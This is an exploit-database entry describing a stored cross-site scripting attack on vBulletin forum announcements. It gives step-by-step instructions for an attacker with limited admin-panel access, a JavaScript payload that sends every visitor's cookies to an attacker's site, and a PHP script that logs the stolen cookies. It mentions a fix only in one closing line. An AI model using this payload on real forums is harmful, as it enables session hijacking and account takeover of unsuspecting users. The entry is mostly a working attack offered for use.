vBulletin Announcements Cookie Steal Vulnerability

ID 1337DAY-ID-19926
Type zdt
Reporter neutr0n
Modified 2012-12-09T00:00:00


If you get access to a forum with an acc that only has default acp, you can get all users information by creating a cookie stealer in announcements.

                                            vBulletin Announcements, by default has html enabled, so if you get access to a forum using other exploits and get a user with acp info, but it only has default admin cp permissions (moderator access and announcements), you can inject a cookie stealer and steal other users informations.

admincp>announcements>create a new one>put some random announcemnt + this code:

<script language="JavaScript">
document.location= " http://www.yoursite.com/cookie.php?p=" + document.cookie; </script>

and in your site put this and name it cookie.php

$cookie = $HTTP_GET_VARS[" p"]; 
$file = fopen('cookielog.txt', 'a'); 
fwrite($file, $cookie . "\n\n"); 
echo " <script>location.href='http://www.google.com';</script>";

If you're the owner, a "fix" for this is disallow html in announcements.

#  0day.today [2016-04-20]  #